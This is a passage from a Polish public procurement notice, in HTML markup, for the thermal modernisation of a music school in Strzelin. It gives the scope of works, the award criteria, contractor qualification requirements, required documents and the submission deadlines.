class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty najkorzystniejszej, zamawiający będzie się kierował<br/>następującymi kryteriami: a) Cena oferty (C) - 60 punktów, b) Okres gwarancji i rękojmi (G) - 40<br/>punktów. Łączna wartość punktowa zostanie obliczona poprzez zsumowanie wartości = wartość<br/>punktowa „C” (cena oferty) + wartość punktowa „G” (okres gwarancji i rękojmi).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 3: „Termomodernizacja budynku Szkoły Muzycznej I stopnia w Strzelinie”<br/>1. Zakres przedmiotu zamówienia obejmuje termomodernizację budynków szkoły muzycznej w Strzelinie, tj. budynku<br/>głównego - A, budynku nowego - B oraz łącznika łączącego oba budynki na kondygnacji I piętra – C m.in. poprzez:<br/>a) demontaż parapetów zewnętrznych oraz obróbek blacharskich;<br/>b) demontaż reklam, anten oraz wszystkich elementów uniemożliwiających prace budowlane;<br/>c) demontaż stolarki okiennej i drzwiowej przewidzianej do wymiany;<br/>d) usunięcie wszystkich tynków głuchych i uszkodzonych;<br/>e) rozbiórkę elementów schodów zewnętrznych;<br/>f) usunięcie starych warstw farb i mas szpachlowych z tynków;<br/>g) rozbiórkę opasek betonowych przy budynku uniemożliwiających odkopanie budynku do poziomu fundamentów;<br/>h) ocieplenie ścian zewnętrznych od wewnątrz płytami termoizolacyjnymi – z wyłączeniem elewacji północnej (A-D)<br/>i) naprawę gzymsów oraz ubytków tynkarskich w detalach;<br/>j) wykonanie docieplenia ścian zewnętrznych styropianem gr. 15 cm metodą lekką-mokrą – dotyczy tylko elewacji A-D;<br/>k) wykonanie nowych tynków zewnętrznych w miejscach skutych tynków;<br/>l) odkopanie ścian fundamentowych i wykonanie nowej izolacji przeciwwodnej, montaż ocieplenia, montaż foli kubełkowej;<br/>m) montaż parapetów zewnętrznych z blachy tytan-cynk;<br/>n) montaż nowych obróbek blacharskich na gzymsach oraz daszkach z blachy tytan-cynk;<br/>o) zamurowanie otworów okiennych w części piwniczej – stanowiących zasyp składu opału;<br/>p) remont przyłączy kanalizacji deszczowej odprowadzającej wody opadowe z rur spustowych;<br/>q) remont schodów zewnętrznych;<br/>r) remont drzwi wejściowych głównych;<br/>s) montaż nowych drzwi od strony elewacji tylnej oraz do kotłowni;<br/>t) montaż nowych daszków granitowych na murkach przy schodach oraz montaż nowej barierki schodowej – przy wejściu<br/>głównym;<br/>u) montaż zadaszenia na elewacji tylnej nad wejściem do kotłowni;<br/>v) montaż nowych rur spustowych;<br/>w) ocieplenie stropodachu granulatem z wełny mineralnej;<br/>x) montaż nowych lamp oświetleniowych zewnętrznych;<br/>y) instalację odgromową – pionowe zwody oraz nowy uziom otokowy budynku;<br/>z) wykonanie opasek wokół budynku grysowych oraz z kostki betonowej<br/>aa) montaż daszka nad schodami zewnętrznymi prowadzającymi do kotłowni;<br/>bb) częściową wymiana stolarki okiennej. Nowe okna z PVC czterokomorowego w kolorze białym, skrzydła rozwieralne i<br/>uchylne z wbudowanym nawiewnikiem z regulacją ciśnieniową z przekładką termiczną. Współczynnik przenikania ciepła<br/>Umax = 0,9W/m2K.<br/>cc) częściową wymianę stolarki drzwiowej;<br/>dd) wykonanie nowej elewacji budynku;<br/>ee) ocieplenie stropu drewnianego – podłogi strychu dostępnego nieogrzewanego;<br/>ff) oczyszczenie i przemalowanie krat, barierek i zadaszeń;<br/>gg) wykonanie podjazdu dla osób niepełnosprawnych z kostki polbrukowej niefazowanej;<br/>hh) montaż nowej drabinki ewakuacyjnej na dachu budynku B;<br/>ii) montaż opasek wokół budynku;<br/>jj) remont pokrycia dachów;<br/>kk) rozbiórkę składu opału;<br/>ll) montaż ogrodzenia w miejscu zlikwidowanego zsypu na opał wraz z montażem bramy od strony dz. nr 54;<br/>mm) wykonanie utwardzeń terenu;<br/>nn) wymiana pokrycia papowego na dachu magazynu – budynek B;<br/>oo) renowacja drzwi głównych do budynku głównego – A. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45443000-4 - Roboty elewacyjne</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty najkorzystniejszej, zamawiający będzie się kierował<br/>następującymi kryteriami: a) Cena oferty (C) - 60 punktów, b) Okres gwarancji i rękojmi (G) - 40<br/>punktów. Łączna wartość punktowa zostanie obliczona poprzez zsumowanie wartości = wartość<br/>punktowa „C” (cena oferty) + wartość punktowa „G” (okres gwarancji i rękojmi).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia w ramach części nr 1 mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1.4. zdolności technicznej lub zawodowej<br/>1) o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie<br/>doświadczenia, tj. że:<br/>a) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w<br/>tym okresie, wykonali należycie jedną robotę budowlaną polegającą na: budowie/rozbudowie/przebudowie lub<br/>termomodernizacji budynku użyteczności publicznej o wartości co najmniej 1.000.000,00 zł brutto (słownie: jeden milion<br/>złotych).<br/>Wykonawca nie może sumować wartości kilku robót budowlanych o mniejszym zakresie dla uzyskania wymaganych<br/>wartości porównywalnych.<br/>2) O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie<br/>dysponowania następującymi osobami zdolnymi do wykonania zamówienia:<br/>a) Kierownik robót budowlanych - minimalne wymagania:<br/>- kwalifikacje zawodowe: uprawnienia budowlane do kierowania robotami budowlanymi odpowiadające przedmiotowi<br/>zamówienia w specjalności konstrukcyjno-budowlanej w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst<br/>jednolity Dz.U. z 2021 r. poz. 2351 z późn. zm.) lub odpowiadające im uprawnienia budowlane, które zostały wydane na<br/>podstawie wcześniej obowiązujących przepisów.<br/>b) Kierownik robót elektrycznych - minimalne wymagania:<br/>- kwalifikacje zawodowe: uprawnienia budowlane do kierowania robotami budowlanymi odpowiadające przedmiotowi<br/>zamówienia w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych w<br/>rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz.U. z 2021 r. poz. 2351 z późn. zm.) lub<br/>odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.<br/>Zgodnie z art. 12 a ustawy z dnia 7 lipca 1994 r. Prawo budowlane samodzielne funkcje techniczne w budownictwie mogą<br/>również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w<br/>przepisach odrębnych, tj. ustawie z dnia 22.12.2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w<br/>państwach członkowskich Unii Europejskiej (tekst jednolity Dz.U. z 2021 poz. 1646 ze zm.) oraz ustawie z dnia 15.12.2000<br/>r. o samorządach zawodowych architektów, inżynierów budownictwa (tekst jednolity Dz. U. z 2019 poz. 1117).<br/>Połączenie stanowisk, o których mowa w pkt 1.4. ust. 2 lit. a) – b) możliwe jest tylko pod warunkiem spełnienia łącznie<br/>wymagań dotyczących kwalifikacji i doświadczenia dla poszczególnych stanowisk.<br/>2. O udzielenie zamówienia w ramach części nr 2 mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>2.4. zdolności technicznej lub zawodowej<br/>1) o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie<br/>doświadczenia, tj. że:<br/>a) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w<br/>tym okresie, wykonali należycie jedną robotę budowlaną polegającą na: budowie/rozbudowie/przebudowie lub<br/>termomodernizacji budynku użyteczności publicznej o wartości co najmniej 2.000.000,00 zł brutto (słownie: dwa miliony<br/>złotych).<br/>Wykonawca nie może sumować wartości kilku robót budowlanych o mniejszym zakresie dla uzyskania wymaganych<br/>wartości porównywalnych.<br/>2) O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie<br/>dysponowania następującymi osobami zdolnymi do wykonania zamówienia:<br/>a) Kierownik robót budowlanych - minimalne wymagania:<br/>- kwalifikacje zawodowe: uprawnienia budowlane do kierowania robotami budowlanymi odpowiadające przedmiotowi<br/>zamówienia w specjalności konstrukcyjno-budowlanej w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst<br/>jednolity Dz.U. z 2021 r. poz. 2351 z późn. zm.) lub odpowiadające im uprawnienia budowlane, które zostały wydane na<br/>podstawie wcześniej obowiązujących przepisów.<br/>Zgodnie z art. 12 a ustawy z dnia 7 lipca 1994 r. Prawo budowlane samodzielne funkcje techniczne w budownictwie mogą<br/>również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w<br/>przepisach odrębnych, tj. ustawie z dnia 22.12.2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (tekst jednolity Dz.U. z 2021 poz. 1646 ze zm.) oraz ustawie z dnia 15.12.2000<br/>r. o samorządach zawodowych architektów, inżynierów budownictwa (tekst jednolity Dz. U. z 2019 poz. 1117).<br/>3. O udzielenie zamówienia w ramach części nr 3 mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>3.4. zdolności technicznej lub zawodowej<br/>1) o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie<br/>doświadczenia, tj. że:<br/>a) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w<br/>tym okresie, wykonali należycie jedną robotę budowlaną polegającą na: budowie/rozbudowie/przebudowie lub<br/>termomodernizacji budynku użyteczności publicznej o wartości co najmniej 1.000.000,00 zł brutto (słownie: jeden milion<br/>złotych).<br/>Wykonawca nie może sumować wartości kilku robót budowlanych o mniejszym zakresie dla uzyskania wymaganych<br/>wartości porównywalnych.<br/>2) O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie<br/>dysponowania następującymi osobami zdolnymi do wykonania zamówienia:<br/>a) Kierownik robót budowlanych - minimalne wymagania:<br/>- kwalifikacje zawodowe: uprawnienia budowlane do kierowania robotami budowlanymi odpowiadające przedmiotowi<br/>zamówienia w specjalności konstrukcyjno-budowlanej w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst<br/>jednolity Dz.U. z 2021 r. poz. 2351 z późn. zm.) lub odpowiadające im uprawnienia budowlane, które zostały wydane na<br/>podstawie wcześniej obowiązujących przepisów.<br/>Zgodnie z art. 12 a ustawy z dnia 7 lipca 1994 r. Prawo budowlane samodzielne funkcje techniczne w budownictwie mogą<br/>również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w<br/>przepisach odrębnych, tj. ustawie z dnia 22.12.2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w<br/>państwach członkowskich Unii Europejskiej (tekst jednolity Dz.U. z 2021 poz. 1646 ze zm.) oraz ustawie z dnia 15.12.2000<br/>r. o samorządach zawodowych architektów, inżynierów budownictwa (tekst jednolity Dz. U. z 2019 poz. 1117).<br/>2.5. W niniejszej SWZ definicje budowy, przebudowy lub remontu należy rozumieć zgodnie z definicjami ustawy z dnia 7<br/>lipca 1994 r. Prawo budowlane (tekst jednolity Dz.U. z 2021 r. poz. 2351 z późn. zm.).<br/>Przez budynek użyteczności publicznej (zgodnie z Rozporządzeniem Ministra Infrastruktury w sprawie warunków<br/>technicznych, jakim powinny odpowiadać budynki i ich usytuowanie – tj. z dnia 17 lipca 2015r. (Dz.U. z 2019 r. poz. 1065)<br/>należy rozumieć budynek przeznaczony na potrzeby administracji publicznej, wymiaru sprawiedliwości, kultury, kultu<br/>religijnego, oświaty, szkolnictwa wyższego, nauki, wychowania, opieki zdrowotnej, społecznej lub socjalnej, obsługi<br/>bankowej, handlu, gastronomii, usług, w tym usług pocztowych lub telekomunikacyjnych, turystyki, sportu, obsługi<br/>pasażerów w transporcie kolejowym, drogowym, lotniczym, morskim lub wodnym śródlądowym, oraz inny budynek<br/>przeznaczony do wykonywania podobnych funkcji; za budynek użyteczności publicznej uznaje się także budynek biurowy<br/>lub socjalny.<br/>2.6. W przypadku składania przez Wykonawcę oferty na dwie lub więcej części, wykazane przez niego, na potwierdzenie<br/>spełniania warunku zdolności technicznej lub zawodowej, minimalne poziomy zdolności w zakresie doświadczenia,<br/>Zamawiający dopuszcza zrealizowanie tej samej roboty budowlanej dla każdej części.<br/>2.7. W przypadku składania przez Wykonawcę oferty na dwie lub więcej części, wykazane przez niego, na potwierdzenie<br/>spełniania zdolności warunku zdolności technicznej lub zawodowej, minimalne poziomy zdolności w zakresie dysponowania<br/>osobami zdolnymi do wykonania zamówienia Zamawiający dopuszcza zatrudnienie jednego kierownika budowy do obsługi<br/>każdej części. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Do oferty Wykonawca<br/>zobowiązany jest dołączyć aktualne na dzień składania ofert: 1.1 W ramach części nr 1: oświadczenia o braku podstaw do<br/>wykluczenia z postępowania – zgodnie z załącznikiem nr 3.1 do SWZ. 1.2 W ramach części nr 2: oświadczenia o braku podstaw do<br/>wykluczenia z postępowania – zgodnie z załącznikiem nr 3.2 do SWZ.1.3 W ramach części nr 3: oświadczenia o braku podstaw do<br/>wykluczenia z postępowania – zgodnie z załącznikiem nr 3.3 do SWZ. 2.Oświadczenia, o którym mowa w pkt 1, potwierdzające brak<br/>podstaw do wykluczenia w postępowaniu na dzień składania ofert, tymczasowo zastępują wymagane przez Zamawiającego<br/>podmiotowe środki dowodowe. 3.Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na ich dzień<br/>złożenia. 4. Podmiotowe środki dowodowe wymagane od wykonawcy obejmują: 1) Oświadczenie wykonawcy, w zakresie art. 108<br/>ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie<br/>konkurencji i konsumentów (t.j. Dz. U. z 2021 r. poz. 275 ze zm.), z innym<br/>wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy<br/>należącego do tej samej grupy kapitałowej – zgodnie z załącznikiem nr 7.1 do SWZ dla części nr 1, nr 7.2 do SWZ dla części nr 2, nr<br/>7.3 do SWZ dla części nr 3.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Do<br/>oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień<br/>składania ofert: 1.1 W ramach części nr 1: a) oświadczenie o spełnianiu warunków udziału w postępowaniu - zgodnie z załącznikiem<br/>nr 2.1 do<br/>SWZ. 1.2 W ramach części nr 2: a) oświadczenie o spełnianiu warunków udziału w postępowaniu - zgodnie z załącznikiem nr 2.2 do<br/>SWZ. 1.3 W ramach części nr 3: a) oświadczenie o spełnianiu warunków udziału w postępowaniu - zgodnie z załącznikiem nr 2.3 do<br/>SWZ. 2. Oświadczenia, o którym mowa w pkt 1, potwierdzające spełnianie warunków udziału w postępowaniu na dzień składania ofert, tymczasowo zastępują wymagane przez Zamawiającego podmiotowe środki dowodowe. 3.<br/>Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5<br/>dni od dnia wezwania,<br/>podmiotowych środków dowodowych, aktualnych na ich dzień złożenia. 4. Podmiotowe środki dowodowe wymagane od wykonawcy<br/>obejmują: 1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia<br/>działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz<br/>których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych<br/>dokumentów - inne odpowiednie dokumenty- zgodnie z załącznikiem nr 5.1 do SWZ dla części nr 1, nr 5.2 do SWZ dla części nr 2, nr<br/>5.3 do SWZ dla części nr 3. W przypadku składania oferty wspólnej wykonawcy składający ofertę wspólną składają jedno wspólne<br/>w/w oświadczenie. 2) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi<br/>osobami – zgodnie z załącznikiem 6.1 do SWZ dla części nr 1, nr 6.2 do SWZ dla części nr 2, nr 6.3 do SWZ dla części nr 3. W<br/>przypadku składania oferty wspólnej wykonawcy składający ofertę wspólną składają jedno wspólne w/w oświadczenie.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Poza podmiotowymi środkami dowodowymi na potwierdzenie braku podstaw wykluczeniu z postępowania i potwierdzenia<br/>spełniania warunków udziału w postępowaniu Wykonawca zobowiązany jest do złożenia wraz z ofertą: a) pełnomocnictwo<br/>upoważniające do złożenia oferty, o ile ofertę<br/>składa pełnomocnik; b) pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia (jeżeli dotyczy);<br/>c)zobowiązanie podmiotu udostępniającego zasoby Wykonawcy zgodnie z załącznikiem nr 10.1 do SWZ dla części nr 1, nr<br/>10.2 do SWZ dla części nr 2, nr 10.3 do SWZ dla części nr 3 (jeżeli dotyczy); d) oświadczenie podmiotu udostępniającego<br/>zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnienie warunków udziału w<br/>postępowaniu – zgodnie z załącznikiem nr 4.1 do SWZ dla części nr 1, nr 4.2 do SWZ dla części nr 2, nr 4.3 do SWZ dla<br/>części nr 3 (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo reprezentowania w postępowaniu i zawarcia umowy. Do oferty wspólnej Wykonawcy dołączają<br/>pełnomocnictwo. 2. Pełnomocnik pozostaje w<br/>kontakcie z Zamawiającym w toku postępowania i do niego Zamawiający kieruje informacje,korespondencję, itp. 3. Oferta<br/>wspólna, składana przez dwóch lub więcej Wykonawców, powinna spełniać następujące wymagania: a) oferta wspólna<br/>powinna być sporządzona zgodnie z SWZ, b) sposób składania dokumentów w ofercie wspólnej:- dokumenty, dotyczące<br/>własnej firmy, takie jak np.: oświadczenie o braku podstaw do wykluczenia składa każdy z Wykonawców składających ofertę<br/>wspólną we własnym imieniu; -dokumenty wspólne takie jak np.: formularz ofertowy, dokumenty podmiotowe i<br/>przedmiotowe składa pełnomocnik Wykonawców w imieniu wszystkich Wykonawców składających ofertę wspólną. 4. Przed<br/>podpisaniem umowy (w przypadku wygrania postępowania) Wykonawcy składający ofertę wspólną będą mieli obowiązek<br/>przedstawić Zamawiającemu umowę konsorcjum, zawierającą, co najmniej: a) zobowiązanie do realizacji wspólnego<br/>przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację przedmiotu zamówienia, b) określenie zakresu<br/>działania poszczególnych stron umowy, c) czas obowiązywania umowy, który nie może być krótszy, niż okres obejmujący<br/>realizację zamówienia oraz czas trwania gwarancji jakości i<br/>rękojmi. 5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki udziału w postępowaniu<br/>określone w pkt 20.2.1., pkt 20.2.2. oraz pkt 20.2.3. SWZ powinni spełniać łącznie wszyscy Wykonawcy, z zastrzeżeniem, iż<br/>warunek określony odpowiednio w pkt 20.2.1.4. ppkt 1) i 2), pkt 20.2.2.4. ppkt 1) i 2) oraz pkt 20.2.3.4. ppkt 1) i 2) SWZ<br/>winien spełniać co najmniej jeden z tych Wykonawców. 6. W odniesieniu do warunków dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia, wykonawcy wspólnie ubiegających się o udzielenie zamówienia mogą polegać<br/>na zdolnościach tych Wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane. W<br/>przypadku, o którym mowa w pkt 20.2.1.4., pkt 20.2.2.4. oraz pkt 20.2.3.4. SWZ, Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia w formularzu ofertowym stanowiącym załącznik nr 1.1 do SWZ dla części nr 1, załącznik nr 1.2 do<br/>SWZ dla części nr 2 oraz załącznik nr 1.3 do SWZ dla części nr 3 składają oświadczenie na podstawie art. 117 ust. 4 dotyczące robót budowlanych, które wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj, zakres zmian oraz warunki ich wprowadzenia określono w projektowanych<br/>postanowieniach umowy stanowiących załącznik nr 8 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-31 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć na Platformie pod adresem: https://gminastrzelin.ezamawiajacy.pl w zakładce „OFERTY&#34;</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-31 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-29</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający na podstawie art. 95 ustawy Prawo zamówień publicznych wymaga zatrudnienia przez Wykonawcę lub<br/>podwykonawcę na podstawie umowy o pracę osób wykonujących czynności w zakresie realizacji zamówienia, jeżeli<br/>wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r.<br/>Kodeks pracy (tekst jednolity Dz. U. z 2020 r. poz. 1320 ze zm.).<br/>1.1. W ramach części nr 1 Zamawiający wymaga zatrudnienia na podstawie umowy o pracę przez Wykonawcę lub<br/>Podwykonawcę osób wykonujących wskazane poniżej czynności w trakcie realizacji zamówienia:<br/>a) czynności związane z obsługą ciężkiego sprzętu budowlanego, tj. m.in.: koparka, ładowarka, koparko-ładowarka,<br/>samochód ciężarowy;<br/>b) czynności związane z wykonaniem konstrukcji i pokrycia dachu;<br/>c) czynności związane z wykonaniem obróbek blacharskich;<br/>d) czynności związane z dociepleniem ścian styropianem metodą lekką-mokrą;<br/>e) czynności tynkarskie;<br/>f) czynności związane z montażem stolarki okiennej;<br/>g) czynności związane z montażem stolarki drzwiowej;<br/>h) czynności związane z montażem zewnętrznej windy dla osób niepełnosprawnych;<br/>i) czynności związane z wykonywaniem 